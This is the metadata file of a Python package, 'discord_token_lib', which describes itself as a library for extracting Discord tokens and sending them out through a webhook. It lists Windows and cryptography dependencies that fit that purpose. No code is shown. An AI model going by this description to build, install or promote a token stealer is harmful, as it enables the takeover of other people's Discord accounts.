Metadata-Version: 2.1
Name: discord_token_lib
Version: 0.1
Summary: Library for extracting and sending Discord tokens via webhook
Home-page: https://github.com/ton-compte/discord_token_lib
Author: HeartWay
Author-email: heartway_c.y@proton.me
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Requires-Dist: requests
Requires-Dist: pycryptodome
Requires-Dist: pypiwin32
